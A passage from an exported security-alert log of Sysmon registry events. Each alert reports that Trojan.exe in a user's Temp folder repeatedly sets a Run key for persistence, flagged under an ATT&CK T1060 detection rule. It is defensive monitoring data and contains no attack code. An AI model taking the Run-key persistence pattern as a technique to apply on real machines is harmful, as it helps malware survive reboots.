..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:34.417196300Z"",""eventRecordID"":""2008"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:34.402\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:34.402"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:36.776",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:33.371 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:33.375259600Z"",""eventRecordID"":""2007"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:33.371\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:33.371"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:35.747",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:32.356 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:32.357577900Z"",""eventRecordID"":""2006"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:32.356\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:32.356"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:34.746",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:31.340 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:31.345210900Z"",""eventRecordID"":""2005"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:31.340\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:31.340"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:33.701",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:30.324 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:30.325274000Z"",""eventRecordID"":""2002"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:30.324\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:30.324"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:32.699",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:29.308 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:29.310809700Z"",""eventRecordID"":""2001"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:29.308\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:29.308"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:31.684",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:28.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:28.301009300Z"",""eventRecordID"":""2000"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:28.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:28.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:30.653",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:27.261 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:27.266046600Z"",""eventRecordID"":""1999"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:27.261\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:27.261"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:29.637",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:26.230 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:26.233516400Z"",""eventRecordID"":""1998"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:26.230\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:26.230"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:28.635",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:25.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:25.218954200Z"",""eventRecordID"":""1995"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:25.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:25.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:27.618",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:24.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:24.206352100Z"",""eventRecordID"":""1994"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:24.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:24.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:26.577",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:23.184 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 